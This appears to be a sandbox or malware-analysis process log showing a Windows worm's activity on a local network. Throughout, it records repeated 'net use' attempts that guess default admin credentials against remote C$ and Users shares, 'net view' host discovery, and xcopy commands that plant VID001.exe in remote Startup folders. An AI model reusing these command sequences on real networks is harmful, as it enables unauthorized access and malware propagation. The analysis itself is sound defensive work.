C:\Windows\SysWOW64\net.exe
net use \\10.7.0.13\C$ "0" /user:"àäìèíèñòðàòîð"
10⤵
PID:1988

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.13\Users "0" /user:"àäìèíèñòðàòîð"
10⤵
PID:1584

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
10⤵
PID:936

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.13\C$ """" /user:"àäìèíèñòðàòîð"
10⤵
PID:640

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.13\Users """" /user:"àäìèíèñòðàòîð"
10⤵
PID:1356

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
10⤵
PID:1052

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.13\C$ "àäìèíèñòðàòîð" /user:"àäìèíèñòðàòîð"
10⤵
PID:1976

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.13\Users "àäìèíèñòðàòîð" /user:"àäìèíèñòðàòîð"
10⤵
PID:1988

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
10⤵
PID:1672

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.13\C$ "1" /user:"àäìèíèñòðàòîð"
10⤵
PID:1976

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.13\Users "1" /user:"àäìèíèñòðàòîð"
10⤵
PID:1108

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
10⤵
PID:1684

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.13\C$ "123" /user:"àäìèíèñòðàòîð"
10⤵
PID:1356

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.13\Users "123" /user:"àäìèíèñòðàòîð"
10⤵
PID:1572

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c net view \\10.7.0.255|find /i " "
10⤵
PID:1672

C:\Windows\SysWOW64\net.exe
net view \\10.7.0.255
11⤵
- Discovers systems in the same network
PID:1048

C:\Windows\SysWOW64\find.exe
find /i " "
11⤵
PID:1764

C:\Windows\SysWOW64\net.exe
net use * /delete /y
10⤵
PID:1976

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
10⤵
- Runs ping.exe
PID:2020

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo f"
10⤵
PID:1544

C:\Windows\SysWOW64\xcopy.exe
xcopy /y /d "C:\Users\Admin\AppData\Roaming\TempoRX\VID001.exe" "\\10.7.0.255\C$\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\VID001.exe"
10⤵
PID:1976

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo f"
10⤵
PID:1048

C:\Windows\SysWOW64\xcopy.exe
xcopy /y /d "C:\Users\Admin\AppData\Roaming\TempoRX\VID001.exe" "\\10.7.0.255\C$\Documents and Settings\1\Start Menu\Programs\Startup\VID001.exe"
10⤵
PID:1496

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo f"
10⤵
PID:1108

C:\Windows\SysWOW64\xcopy.exe
xcopy /y /d "C:\Users\Admin\AppData\Roaming\TempoRX\VID001.exe" "\\10.7.0.255\C$\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VID001.exe"
10⤵
PID:1312

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.255\C$ /delete /y
10⤵
PID:1356

C:\Windows\SysWOW64\PING.EXE
ping -n 20 localhost
10⤵
PID:1048

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo f"
10⤵
PID:2092

C:\Windows\SysWOW64\xcopy.exe
xcopy /y /d "C:\Users\Admin\AppData\Roaming\TempoRX\VID001.exe" "\\10.7.0.255\Users\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\VID001.exe"
10⤵
PID:2100

C:\Windows\SysWOW64\xcopy.exe
xcopy /y /d "C:\Users\Admin\AppData\Roaming\TempoRX\VID001.exe" "\\10.7.0.255\Users\Documents and Settings\1\Start Menu\Programs\Startup\VID001.exe"
10⤵
PID:2172

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo f"
10⤵
PID:2164

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo f"
10⤵
PID:2180

C:\Windows\SysWOW64\xcopy.exe
xcopy /y /d "C:\Users\Admin\AppData\Roaming\TempoRX\VID001.exe" "\\10.7.0.255\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VID001.exe"
10⤵
PID:2188

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.255\Users /delete /y
10⤵
PID:2196

C:\Windows\SysWOW64\PING.EXE
ping -n 20 localhost
10⤵
PID:2216

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
10⤵
- Runs ping.exe
PID:2320

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.255\C$ """" /user:"1"
10⤵
PID:2360

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.255\Users """" /user:"1"
10⤵
PID:2388

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
10⤵
PID:2408

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.255\C$ "1" /user:"1"
10⤵
PID:2464

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.255\Users "1" /user:"1"
10⤵
PID:2484

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
10⤵
PID:2504

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.255\C$ "1" /user:"1"
10⤵
PID:2556

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.255\Users "1" /user:"1"
10⤵
PID:2580

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
10⤵
PID:2600

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.255\C$ "123" /user:"1"
10⤵
PID:2624

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.255\Users "123" /user:"1"
10⤵
PID:2648

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
10⤵
PID:2692

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.255\C$ "0" /user:"10.7.0.255"
10⤵
PID:2720

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.255\Users "0" /user:"10.7.0.255"
10⤵
PID:2748

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
10⤵
- Runs ping.exe
PID:2764

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.255\C$ """" /user:"10.7.0.255"
10⤵
PID:2816

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.255\Users """" /user:"10.7.0.255"
10⤵
PID:2836

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
10⤵
PID:2856

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.255\C$ "10.7.0.255" /user:"10.7.0.255"
10⤵
PID:2908

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.255\Users "10.7.0.255" /user:"10.7.0.255"
10⤵
PID:2924

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
10⤵
PID:2944

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.255\C$ "1" /user:"10.7.0.255"
10⤵
PID:2972

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.255\Users "1" /user:"10.7.0.255"
10⤵
PID:2992

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
10⤵
PID:3012

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.255\C$ "123" /user:"10.7.0.255"
10⤵
PID:3040

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.255\Users "123" /user:"10.7.0.255"
10⤵
PID:3060

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
10⤵
PID:2060

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.255\C$ "0" /user:"administrator"
10⤵
PID:2020

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.255\Users "0" /user:"administrator"
10⤵
PID:2108

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
10⤵
PID:2144

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.255\C$ """" /user:"administrator"
10⤵
PID:2172

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.255\Users """" /user:"administrator"
10⤵
PID:2208

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
10⤵
PID:2300

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.255\C$ "administrator" /user:"administrator"
10⤵
PID:1996

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.255\Users "administrator" /user:"administrator"
10⤵
PID:2236

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
10⤵
PID:2332

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.255\C$ "1" /user:"administrator"
10⤵
PID:2392

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.255\Users "1" /user:"administrator"
10⤵
PID:2456

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
10⤵
- Runs ping.exe
PID:2428

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.255\C$ "123" /user:"administrator"
10⤵
PID:2464

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.255\Users "123" /user:"administrator"
10⤵
PID:2492

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
10⤵
PID:300

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.255\C$ "0" /user:"user"
10⤵
PID:2552

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.255\Users "0" /user:"user"
10⤵
PID:2508

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
10⤵
PID:2556

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.255\C$ """" /user:"user"
10⤵
PID:2616

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.255\Users """" /user:"user"
10⤵
PID:2636

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
10⤵
- Runs ping.exe
PID:2680

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.255\C$ "user" /user:"user"
10⤵
PID:1780

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.255\Users "user" /user:"user"
10⤵
PID:2704

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
10⤵
PID:2744

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.255\C$ "1" /user:"user"
10⤵
PID:2760

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.255\Users "1" /user:"user"
10⤵
PID:2804

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
10⤵
- Runs ping.exe
PID:2776

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.255\C$ "123" /user:"user"
10⤵
PID:2828

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.255\Users "123" /user:"user"
10⤵
PID:2848

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
10⤵
PID:2900

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.255\C$ "0" /user:"admin"
10⤵
PID:2932

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.255\Users "0" /user:"admin"
10⤵
PID:2368

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
10⤵
PID:2960

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.255\C$ """" /user:"admin"
10⤵
PID:2984

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.255\Users """" /user:"admin"
10⤵
PID:3036

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
10⤵
- Runs ping.exe
PID:3032

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.255\C$ "admin" /user:"admin"
10⤵
PID:3044

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.255\Users "admin" /user:"admin"
10⤵
PID:3064

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
10⤵
- Runs ping.exe
PID:2088

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.255\C$ "1" /user:"admin"
10⤵
PID:1064

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.255\Users "1" /user:"admin"
10⤵
PID:2152

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
10⤵
- Runs ping.exe
PID:2204

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.255\C$ "123" /user:"admin"
10⤵
PID:1016

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.255\Users "123" /user:"admin"
10⤵
PID:1900

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
10⤵
- Runs ping.exe
PID:2232

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.255\C$ "0" /user:"àäìèíèñòðàòîð"
10⤵
PID:2296

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.255\Users "0" /user:"àäìèíèñòðàòîð"
10⤵
PID:2404

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
10⤵
PID:2324

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.255\C$ """" /user:"àäìèíèñòðàòîð"
10⤵
PID:2440

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.255\Users """" /user:"àäìèíèñòðàòîð"
10⤵
PID:2416

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
10⤵
- Runs ping.exe
PID:2480

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.255\C$ "àäìèíèñòðàòîð" /user:"àäìèíèñòðàòîð"
10⤵
PID:2544

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.255\Users "àäìèíèñòðàòîð" /user:"àäìèíèñòðàòîð"
10⤵
PID:2612

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
10⤵
PID:2600

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.255\C$ "1" /user:"àäìèíèñòðàòîð"
10⤵
PID:2624

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.255\Users "1" /user:"àäìèíèñòðàòîð"
10⤵
PID:2676

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
10⤵
PID:2680

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.255\C$ "123" /user:"àäìèíèñòðàòîð"
10⤵
PID:2696

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.255\Users "123" /user:"àäìèíèñòðàòîð"
10⤵
PID:2752

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c net view \\10.7.0.19|find /i " "
10⤵
PID:2744

C:\Windows\SysWOW64\net.exe
net view \\10.7.0.19
11⤵
- Discovers systems in the same network
PID:2748

C:\Windows\SysWOW64\find.exe
find /i " "
11⤵
PID:2756

C:\Windows\SysWOW64\net.exe
net use * /delete /y
10⤵
PID:2804

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
10⤵
PID:2780

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo f"
10⤵
PID:2828

C:\Windows\SysWOW64\xcopy.exe
xcopy /y /d "C:\Users\Admin\AppData\Roaming\TempoRX\VID001.exe" "\\10.7.0.19\C$\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\VID001.exe"
10⤵
PID:2836

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo f"
10⤵
PID:2876

C:\Windows\SysWOW64\xcopy.exe
xcopy /y /d "C:\Users\Admin\AppData\Roaming\TempoRX\VID001.exe" "\\10.7.0.19\C$\Documents and Settings\1\Start Menu\Programs\Startup\VID001.exe"
10⤵
PID:2872

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo f"
10⤵
PID:1948

C:\Windows\SysWOW64\xcopy.exe
xcopy /y /d "C:\Users\Admin\AppData\Roaming\TempoRX\VID001.exe" "\\10.7.0.19\C$\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VID001.exe"
10⤵
PID:2916

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.19\C$ /delete /y
10⤵
PID:2896

C:\Windows\SysWOW64\PING.EXE
ping -n 20 localhost
10⤵
PID:188

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo f"
10⤵
PID:2960

C:\Windows\SysWOW64\xcopy.exe
xcopy /y /d "C:\Users\Admin\AppData\Roaming\TempoRX\VID001.exe" "\\10.7.0.19\Users\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\VID001.exe"
10⤵
PID:3008

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo f"
10⤵
PID:3000

C:\Windows\SysWOW64\xcopy.exe
xcopy /y /d "C:\Users\Admin\AppData\Roaming\TempoRX\VID001.exe" "\\10.7.0.19\Users\Documents and Settings\1\Start Menu\Programs\Startup\VID001.exe"
10⤵
PID:3020

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo f"
10⤵
PID:3024

C:\Windows\SysWOW64\xcopy.exe
xcopy /y /d "C:\Users\Admin\AppData\Roaming\TempoRX\VID001.exe" "\\10.7.0.19\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VID001.exe"
10⤵
PID:3052

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.19\Users /delete /y
10⤵
PID:3056

C:\Windows\SysWOW64\PING.EXE
ping -n 20 localhost
10⤵
PID:2064

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
10⤵
PID:2060

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.19\C$ """" /user:"1"
10⤵
PID:2168

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.19\Users """" /user:"1"
10⤵
PID:2284

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
10⤵
PID:2028

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.19\C$ "1" /user:"1"
10⤵
PID:1900

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.19\Users "1" /user:"1"
10⤵
PID:2328

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
10⤵
- Runs ping.exe
PID:2356

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.19\C$ "1" /user:"1"
10⤵
PID:2404

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.19\Users "1" /user:"1"
10⤵
PID:2320

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
10⤵
PID:2460

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.19\C$ "123" /user:"1"
10⤵
PID:2532

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.19\Users "123" /user:"1"
10⤵
PID:2472

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
10⤵
PID:2632

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.19\C$ "0" /user:"10.7.0.19"
10⤵
PID:2212

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.19\Users "0" /user:"10.7.0.19"
10⤵
PID:2608

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
10⤵
PID:2636

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.19\C$ """" /user:"10.7.0.19"
10⤵
PID:1780

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.19\Users """" /user:"10.7.0.19"
10⤵
PID:2680

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
10⤵
PID:2696

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.19\C$ "10.7.0.19" /user:"10.7.0.19"
10⤵
PID:2792

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.19\Users "10.7.0.19" /user:"10.7.0.19"
10⤵
PID:2824

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
10⤵
- Runs ping.exe
PID:2844

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.19\C$ "1" /user:"10.7.0.19"
10⤵
PID:1948

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.19\Users "1" /user:"10.7.0.19"
10⤵
PID:2868

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
10⤵
- Runs ping.exe
PID:2372

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.19\C$ "123" /user:"10.7.0.19"
10⤵
PID:2924

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.19\Users "123" /user:"10.7.0.19"
10⤵
PID:2992

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
10⤵
- Runs ping.exe
PID:2984

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.19\C$ "0" /user:"administrator"
10⤵
PID:3024

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.19\Users "0" /user:"administrator"
10⤵
PID:3016

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
10⤵
- Runs ping.exe
PID:2264

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.19\C$ """" /user:"administrator"
10⤵
PID:780

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.19\Users """" /user:"administrator"
10⤵
PID:2020

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
10⤵
PID:952

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.19\C$ "administrator" /user:"administrator"
10⤵
PID:2208

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.19\Users "administrator" /user:"administrator"
10⤵
PID:1016

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
10⤵
PID:1996

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.19\C$ "1" /user:"administrator"
10⤵
PID:2340

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.19\Users "1" /user:"administrator"
10⤵
PID:2356

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
10⤵
- Runs ping.exe
PID:2404

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.19\C$ "123" /user:"administrator"
10⤵
PID:2468

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.19\Users "123" /user:"administrator"
10⤵
PID:2456

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
10⤵
PID:2484

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.19\C$ "0" /user:"user"
10⤵
PID:2472

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.19\Users "0" /user:"user"
10⤵
PID:2156

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
10⤵
- Runs ping.exe
PID:2616

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.19\C$ """" /user:"user"
10⤵
PID:2636

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.19\Users """" /user:"user"
10⤵
PID:1780

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
10⤵
PID:2728

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.19\C$ "user" /user:"user"
10⤵
PID:2736

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.19\Users "user" /user:"user"
10⤵
PID:2748

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
10⤵
PID:2804

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.19\C$ "1" /user:"user"
10⤵
PID:2768

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.19\Users "1" /user:"user"
10⤵
PID:2780

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
10⤵
- Runs ping.exe
PID:2912

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.19\C$ "123" /user:"user"
10⤵
PID:1588

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.19\Users "123" /user:"user"
10⤵
PID:2996

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
10⤵
- Runs ping.exe
PID:2952

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.19\C$ "0" /user:"admin"
10⤵
PID:2972

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.19\Users "0" /user:"admin"
10⤵
PID:3012

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
10⤵
PID:3048

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.19\C$ """" /user:"admin"
10⤵
PID:2164

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.19\Users """" /user:"admin"
10⤵
PID:1472

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
10⤵
PID:3040

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.19\C$ "admin" /user:"admin"
10⤵
PID:2020

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.19\Users "admin" /user:"admin"
10⤵
PID:2148

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
10⤵
PID:2284

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.19\C$ "1" /user:"admin"
10⤵
PID:2220

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.19\Users "1" /user:"admin"
10⤵
PID:2452

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
10⤵
- Runs ping.exe
PID:2320

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.19\C$ "123" /user:"admin"
10⤵
PID:2440

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.19\Users "123" /user:"admin"
10⤵
PID:2492

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
10⤵
PID:2448

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.19\C$ "0" /user:"àäìèíèñòðàòîð"
10⤵
PID:2612

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.19\Users "0" /user:"àäìèíèñòðàòîð"
10⤵
PID:2472

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
10⤵
PID:2156

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.19\C$ """" /user:"àäìèíèñòðàòîð"
10⤵
PID:2692

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.19\Users """" /user:"àäìèíèñòðàòîð"
10⤵
PID:2704

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
10⤵
PID:2740

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.19\C$ "àäìèíèñòðàòîð" /user:"àäìèíèñòðàòîð"
10⤵
PID:2696

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.19\Users "àäìèíèñòðàòîð" /user:"àäìèíèñòðàòîð"
10⤵
PID:2792

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
10⤵
PID:2940

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.19\C$ "1" /user:"àäìèíèñòðàòîð"
10⤵
PID:2852

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.19\Users "1" /user:"àäìèíèñòðàòîð"
10⤵
PID:2816

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
10⤵
PID:2956

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.19\C$ "123" /user:"àäìèíèñòðàòîð"
10⤵
PID:2964

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.19\Users "123" /user:"àäìèíèñòðàòîð"
10⤵
PID:2372

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c net view \\10.7.0.1|find /i " "
10⤵
PID:2924

C:\Windows\SysWOW64\net.exe
net view \\10.7.0.1
11⤵
- Discovers systems in the same network
PID:2960

C:\Windows\SysWOW64\find.exe
find /i " "
11⤵
PID:2952

C:\Windows\SysWOW64\net.exe
net use * /delete /y
10⤵
PID:1356

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
10⤵
PID:3060

C:\Windows\SysWOW64\xcopy.exe
xcopy /y /d "C:\Users\Admin\AppData\Roaming\TempoRX\VID001.exe" "\\10.7.0.1\C$\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\VID001.exe"
10⤵
PID:3056

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo f"
10⤵
PID:3016

C:\Windows\SysWOW64\xcopy.exe
xcopy /y /d "C:\Users\Admin\AppData\Roaming\TempoRX\VID001.exe" "\\10.7.0.1\C$\Documents and Settings\1\Start Menu\Programs\Startup\VID001.exe"
10⤵
PID:1764

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo f"
10⤵
PID:780

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.1\C$ /delete /y
10⤵
PID:2316

C:\Windows\SysWOW64\xcopy.exe
xcopy /y /d "C:\Users\Admin\AppData\Roaming\TempoRX\VID001.exe" "\\10.7.0.1\C$\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VID001.exe"
10⤵
PID:1184

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo f"
10⤵
PID:2148

C:\Windows\SysWOW64\PING.EXE
ping -n 20 localhost
10⤵
- Runs ping.exe
PID:2396

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo f"
10⤵
PID:2736

C:\Windows\SysWOW64\xcopy.exe
xcopy /y /d "C:\Users\Admin\AppData\Roaming\TempoRX\VID001.exe" "\\10.7.0.1\Users\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\VID001.exe"
10⤵
PID:2756

C:\Windows\SysWOW64\xcopy.exe
xcopy /y /d "C:\Users\Admin\AppData\Roaming\TempoRX\VID001.exe" "\\10.7.0.1\Users\Documents and Settings\1\Start Menu\Programs\Startup\VID001.exe"
10⤵
PID:2792

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo f"
10⤵
PID:2840

C:\Windows\SysWOW64\xcopy.exe
xcopy /y /d "C:\Users\Admin\AppData\Roaming\TempoRX\VID001.exe" "\\10.7.0.1\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VID001.exe"
10⤵
PID:2908

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.1\Users /delete /y
10⤵
PID:2940

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo f"
10⤵
PID:2804

C:\Windows\SysWOW64\PING.EXE
ping -n 20 localhost
10⤵
PID:2852

